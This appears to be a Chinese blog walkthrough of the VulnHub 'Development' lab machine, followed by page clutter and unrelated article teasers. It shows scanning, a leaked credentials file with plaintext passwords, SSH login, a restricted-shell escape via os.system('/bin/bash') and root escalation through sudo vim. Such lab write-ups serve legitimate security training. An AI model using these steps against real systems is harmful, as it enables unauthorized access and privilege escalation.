漏洞复现 -- Development

最新推荐文章于 2024-08-04 22:57:35 发布
最新推荐文章于 2024-08-04 22:57:35 发布
阅读量165 收藏
点赞数 3
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/140041895
版权

一、靶机地址

https://www.vulnhub.com/entry/digitalworldlocal-development,280/

二、漏洞复现

sudo arp-scan -l

nmap -p- 192.168.159.156 --min-rate=5000

http://192.168.159.156:8080

http://192.168.159.156:8080/html_pages

http://192.168.159.156:8080/about.html
http://192.168.159.156:8080/config.html
http://192.168.159.156:8080/default.html
http://192.168.159.156:8080/development.html
http://192.168.159.156:8080/downloads.html
http://192.168.159.156:8080/error.html
http://192.168.159.156:8080/html_pages
http://192.168.159.156:8080/index.html
http://192.168.159.156:8080/login.html
http://192.168.159.156:8080/register.html
http://192.168.159.156:8080/tryharder.html
http://192.168.159.156:8080/uploads.html
在development.html页面发现内容

http://192.168.159.156:8080/development.html

http://192.168.159.156:8080/hackersecretpage

未发现有用信息

查看development网页源代码
<!-- You tried harder! Visit ./developmentsecretpage. -->

http://192.168.159.156:8080/developmentsecretpage
提示访问Patrick的php页面,同时知道有一个用户叫Patrick

根据超链接继续访问,发现有一个站点地图

访问站点地图后,测试登出

重新登录测试

基于关键字搜索查询
查看存在本地文件包含slogin_lib.inc.php
http://192.168.159.156:8080/developmentsecretpage/slog_users.txt
解密:
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb
intern, 12345678900987654321
patrick, P@ssw0rd25
qiu, qiu

ssh intern@192.168.159.156

切换成tty终端后查看文件,提示我们必须与用户 Patrick 进一步合作
echo os.system('/bin/bash')
cat local.txt
cat work.txt

切换为Patrick账号
su - patrick
查看patrick账号权限
sudo -l

vim提权
sudo vim

输入如下内容
:!bash   或者
:!sh

查看已经切换为root权限
id

冷酷小帅~0x7e
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Type-Driven Development with Idris
04-24
### Type-Driven Development with Idris #### 引言 《Type-Driven Development with Idris》这本书由Edwin Brady撰写,旨在介绍一种基于类型的软件开发方法,这种方法使用Idris编程语言来实现。Idris是一种功能...
Front-End Web Development
11-25
Front-end development targets the browser, putting your applications in front of the widest range of users regardless of device or operating system. This guide will give you a solid foundation for ...
Development-Kit
03-29
D:\Ruby187>gem install ruby-debug-base ERROR: Error installing ruby-debug-base: The 'linecache' native gem requires installed build ...at 'http://github.com/oneclick/rubyinstaller/wiki/Development-Kit'
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
供应链安全:黑客攻击 Nimble 包
weixin_47075747的博客
08-04 533
在软件开发领域,包管理器对于管理依赖项和简化开发过程至关重要。但是,这些工具并非对漏洞免疫。今天,我们将深入研究一个有趣的案例研究,了解我如何利用 Nimble 包管理器的漏洞来接管包并可能危害系统。系好安全带;这将是一次技术之旅。
云计算第二阶段:----监控与服务安全SECURITY
qq_53738093的博客
08-04 839
对服务的管理,不能仅限于可用性。还需要服务可以安全、稳定、高效地运行。监控的目的:早发现、早治疗。公开数据:对外开放的,不需要认证即可获取的数据私有数据:对外不开放,需要认证、权限才能获得的数据。
Yarn:一个快速、可靠且安全的JavaScript包管理工具
来自计科大一萌新的编程记录本
08-04 659
学习目标:了解yarn的安装与配置
Android网络安全:如何防止中间人攻击
陆业聪
08-04 355
本文介绍了在Android开发中预防中间人攻击的方法,包括使用HTTPS加密通信、实施证书锁定、遵循SSL/TLS最佳实践和验证服务器主机名。这些措施有助于保护用户数据安全,提高应用程序安全性。
网络安全数字化转型
2401_84466325的博客
08-04 363
从狭义层面来看,是指依托先进的数据处理技术,包括数据采集的全面性、数据治理的规范性、数据分析的深入性、数据关联的精准性以及数据应用的有效性,来直接应对并解决当前网络安全领域所面临的挑战与问题。这一过程不仅为网络安全工作的决策提供了坚实的数据基础与科学依据,还显著区别于传统网络安全模式——传统告警信息已不再是主导分析的核心数据,而是转变为辅助决策的参考信息,体现了网络安全分析重心的深刻转变与升级。而从广义视角审视,数字化网络安全则是围绕数据这一核心要素,构建了一个动态优化的安全生态体系。
DNS安全概述
2401_84466361的博客
08-04 598
举个例子:现在很多服务都是托管在云上面,如果一个子域名曾经使用过,并且对外提供了服务,在下线服务的时候没有移除相应的DNS记录,同一个云上的其他用户就有可能使用原服务相同的公网IP。也有一些运营商,出于某种目的,会支持DNS流量,但是其提供的硬件资源不够,引起DNS解析异常缓慢甚至超时,严重影响用户体验。是一种由DNS客户端(通常是用户的应用程序,如一个浏览器)向本地DNS解析器发出解析请求,然后本地DNS解析器负责查询最终结果并将结果返回给客户端,而中间的所有查询请求都由本地DNS解析器代替客户端完成。
第十二章:设置pod和容器权限-保障集群内节点和⽹络安全
weixin_54279427的博客
08-04 490
PodSecuri​tyPol​icy是⼀种集群级别(⽆命名空间)的资源,它定义了⽤户能否在pod中使⽤各种安全相关的特性。维护PodSecuri​tyPol​icy资源中配置策略的⼯作由集成在API服务器中的PodSecuri​tyPol​icy准⼊控制插件完成​。需查看是否开启了PodSecurityPolicy准入插件。当有⼈向API服务器发送pod资源时,PodSecuri​tyPol​icy准⼊控制插件会将这个pod与已经配置的PodSecuri​tyPol​icy进⾏校验。
第128天:内网安全-横向移动&IPC&AT&SC 命令&Impacket 套件&CS 插件&全自动
最新发布
weixin_71529930的博客
08-04 464
首先ipc建立隧道,这里的思路就是利用刚才抓取的账号密码,一个一个试,可能别人用他的账号登录过这台主机,那么他的账号密码就会记录下来,这里我刚搭建的环境,没登陆过,假设账号密码已知^_^,或者你要是知道了域控管理员的账号直接利用管理员账号登录。创建ipc隧道,这里上传的时候发现这里创建隧道已经不能再用域用户了,要么使用这台主机的管理员用户,要么使用域的管理员用户,可能是系统的安全策略做了提升。现在知道了域内的网段,探测存活主机,一般主机都会默认开启IPC$,ipc的端口是135,这里利用。
Python】pandas:排序、重复值、缺省值处理、合并、分组
yannan20190313的博客
07-30 1177
Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
本地部署 Llama-3-EvoVLM-JP-v2
engchina的专栏
08-04 285
本地部署 Llama-3-EvoVLM-JP-v2
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 435
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
python字符串数据容器练习(replace,split,count)
2301_79600015的博客
07-31 508
Python字符串是由一系列字符组成的数据类型。在Python中,字符串是不可变的,这意味着一旦创建了一个字符串,就不能修改它的内容。以下是关于Python字符串的一些重要知识点:1. 字符串的基本操作:拼接字符串:使用`+`运算符。重复字符串:使用`*`运算符。索引和切片:使用`[]`和`:`操作符访问字符串中的子串。长度:使用`len()`函数获取字符串长度。转换大小写:使用`upper()`和`lower()`方法。分割和连接:使用`split()`和`join()`方法。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 604
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值